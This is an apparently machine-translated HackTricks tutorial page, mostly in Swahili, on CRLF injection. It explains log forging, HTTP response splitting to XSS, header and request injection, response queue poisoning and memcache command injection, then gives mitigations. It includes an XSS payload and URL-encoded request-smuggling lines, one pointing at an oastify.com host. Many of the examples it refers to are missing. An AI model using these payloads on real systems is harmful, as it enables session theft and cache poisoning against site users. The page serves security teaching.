CRLF (%0D%0A) Injection
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Bug bounty tip: jiandikishe kwa Intigriti, jukwaa la bug bounty la kiwango cha juu lililotengenezwa na hackers, kwa hackers! Jiunge nasi kwenye https://go.intigriti.com/hacktricks leo, na uanze kupata zawadi hadi $100,000!
Carriage Return (CR) na Line Feed (LF), kwa pamoja wanajulikana kama CRLF, ni mfuatano wa wahusika maalum unaotumika katika itifaki ya HTTP kuashiria mwisho wa mstari au kuanza mstari mpya. Seva za wavuti na vivinjari hutumia CRLF kutofautisha kati ya vichwa vya HTTP na mwili wa jibu. Wahusika hawa hutumika kwa ujumla katika mawasiliano ya HTTP/1.1 kati ya aina mbalimbali za seva za wavuti, kama vile Apache na Microsoft IIS.
CRLF injection inahusisha kuingiza wahusika wa CR na LF katika pembejeo zinazotolewa na mtumiaji. Kitendo hiki kinapotosha seva, programu, au mtumiaji kufasiri mfuatano ulioingizwa kama mwisho wa jibu moja na mwanzo wa jingine. Ingawa wahusika hawa si hatari kwa asili, matumizi yao mabaya yanaweza kusababisha kugawanyika kwa majibu ya HTTP na shughuli nyingine za uhalifu.
Fikiria faili la kumbukumbu katika paneli ya usimamizi inayofuata muundo: IP - Wakati - Njia Iliyotembelewa
. Kuingia kwa kawaida kunaweza kuonekana kama:
Mshambuliaji anaweza kutumia CRLF injection kubadilisha hii log. Kwa kuingiza wahusika wa CRLF katika ombi la HTTP, mshambuliaji anaweza kubadilisha mtiririko wa pato na kutunga entries za log. Kwa mfano, mfuatano ulioingizwa unaweza kubadilisha entry ya log kuwa:
Hapa, %0d
na %0a
zinawakilisha fomu za URL-encoded za CR na LF. Baada ya shambulio, log itakuwa naonyesha kwa njia ya kupotosha:
The attacker thus cloaks their malicious activities by making it appear as if the localhost (an entity typically trusted within the server environment) performed the actions. The server interprets the part of the query starting with %0d%0a
as a single parameter, while the restrictedaction
parameter is parsed as another, separate input. The manipulated query effectively mimics a legitimate administrative command: /index.php?page=home&restrictedaction=edit
HTTP Response Splitting ni udhaifu wa usalama unaotokea wakati mshambuliaji anatumia muundo wa majibu ya HTTP. Muundo huu unachanganya vichwa na mwili kwa kutumia mfuatano maalum wa wahusika, Carriage Return (CR) ikifuatiwa na Line Feed (LF), kwa pamoja huitwa CRLF. Ikiwa mshambuliaji anaweza kuingiza mfuatano wa CRLF katika kichwa cha jibu, wanaweza kwa ufanisi kubadilisha maudhui ya jibu linalofuata. Aina hii ya urekebishaji inaweza kusababisha matatizo makubwa ya usalama, hasa Cross-site Scripting (XSS).
Programu inaweka kichwa maalum kama hiki: X-Custom-Header: UserInput
Programu inapata thamani ya UserInput
kutoka kwa parameter ya query, sema "user_input". Katika hali ambazo hazina uthibitisho sahihi wa pembejeo na uandishi, mshambuliaji anaweza kuunda payload inayojumuisha mfuatano wa CRLF, ikifuatiwa na maudhui mabaya.
Mshambuliaji anaunda URL yenye 'user_input' iliyoundwa kwa njia maalum: ?user_input=Value%0d%0a%0d%0a<script>alert('XSS')</script>
Katika URL hii, %0d%0a%0d%0a
ni fomu ya URL-encoded ya CRLFCRLF. Inapotosha server kuingiza mfuatano wa CRLF, ikifanya server itendee sehemu inayofuata kama mwili wa jibu.
Server inareflect pembejeo ya mshambuliaji katika kichwa cha jibu, ikisababisha muundo usio kusudiwa wa jibu ambapo script mbaya inatafsiriwa na kivinjari kama sehemu ya mwili wa jibu.
Browser to:
Na server inajibu na kichwa:
Mfano mwingine: (kutoka https://www.acunetix.com/websitesecurity/crlf-injection/)
Unaweza kutuma payload ndani ya njia ya URL ili kudhibiti jibu kutoka kwa seva (mfano kutoka hapa):
Check more examples in:
HTTP Header Injection, mara nyingi inavyotumiwa kupitia CRLF (Carriage Return and Line Feed) injection, inaruhusu washambuliaji kuingiza vichwa vya HTTP. Hii inaweza kudhoofisha mitambo ya usalama kama vile XSS (Cross-Site Scripting) filters au SOP (Same-Origin Policy), ambayo inaweza kusababisha ufikiaji usioidhinishwa wa data nyeti, kama vile CSRF tokens, au udanganyifu wa vikao vya watumiaji kupitia kupanda kwa cookie.
Mshambuliaji anaweza kuingiza vichwa vya HTTP ili kuwezesha CORS (Cross-Origin Resource Sharing), akipita vizuizi vilivyowekwa na SOP. Uvunjaji huu unaruhusu scripts kutoka kwa vyanzo vya uhalifu kuingiliana na rasilimali kutoka chanzo tofauti, na hivyo kupata data iliyo salama.
CRLF injection inaweza kutumika kuunda na kuingiza ombi jipya la HTTP. Mfano maarufu wa hili ni udhaifu katika darasa la SoapClient
la PHP, hasa ndani ya parameter ya user_agent
. Kwa kubadilisha parameter hii, mshambuliaji anaweza kuingiza vichwa vya ziada na maudhui ya mwili, au hata kuingiza ombi jipya la HTTP kabisa. Hapa chini kuna mfano wa PHP unaoonyesha uvunjaji huu:
Kwa maelezo zaidi kuhusu mbinu hii na matatizo yanayoweza kutokea angalia chanzo asilia.
Unaweza kuingiza vichwa muhimu ili kuhakikisha back-end inaendelea na muunganisho wazi baada ya kujibu ombi la awali:
Afterward, a second request can be specified. This scenario typically involves HTTP request smuggling, a technique where extra headers or body elements appended by the server post-injection can lead to various security exploits.
Exploitation:
Malicious Prefix Injection: This method involves poisoning the next user's request or a web cache by specifying a malicious prefix. An example of this is:
GET /%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0d%0aGET%20/redirplz%20HTTP/1.1%0d%0aHost:%20oastify.com%0d%0a%0d%0aContent-Length:%2050%0d%0a%0d%0a HTTP/1.1
Crafting a Prefix for Response Queue Poisoning: This approach involves creating a prefix that, when combined with trailing junk, forms a complete second request. This can trigger response queue poisoning. An example is:
GET /%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0d%0aGET%20/%20HTTP/1.1%0d%0aFoo:%20bar HTTP/1.1
Memcache is a key-value store that uses a clear text protocol. More info in:
For the full information read the original writeup
If a platform is taking data from an HTTP request and using it without sanitizing it to perform requests to a memcache server, an attacker could abuse this behaviour to inject new memcache commands.
For example, in the original discovered vuln, cache keys were used to return the IP and port a user should connect to, and attackers were able to inject memcache commands that would poison the cache to send the victims details (usernames and passwords included) to the attacker servers:
Moreover, researchers also discovered that they could desync the memcache responses to send the attacker's IP and ports to users whose email the attacker didn't know:
To mitigate the risks of CRLF (Carriage Return and Line Feed) or HTTP Header Injections in web applications, the following strategies are recommended:
Avoid Direct User Input in Response Headers: Njia salama zaidi ni kuepuka kuingiza maoni ya mtumiaji moja kwa moja katika vichwa vya majibu.
Encode Special Characters: Ikiwa kuepuka kuingiza maoni ya mtumiaji moja kwa moja haiwezekani, hakikisha kutumia kazi iliyokusudiwa kwa ajili ya kuandika wahusika maalum kama CR (Carriage Return) na LF (Line Feed). Praktiki hii inazuia uwezekano wa CRLF injection.
Update Programming Language: Sasisha mara kwa mara lugha ya programu inayotumika katika programu zako za wavuti hadi toleo la hivi karibuni. Chagua toleo ambalo kwa asili haliruhusu kuingizwa kwa wahusika wa CR na LF ndani ya kazi zinazotumika kuweka vichwa vya HTTP.
Usisahau: jiandikishe kwa Intigriti, jukwaa la bug bounty la kiwango cha juu lililotengenezwa na hackers, kwa hackers! Jiunge nasi https://go.intigriti.com/hacktricks leo, na anza kupata zawadi hadi $100,000!
Jifunze & fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze & fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)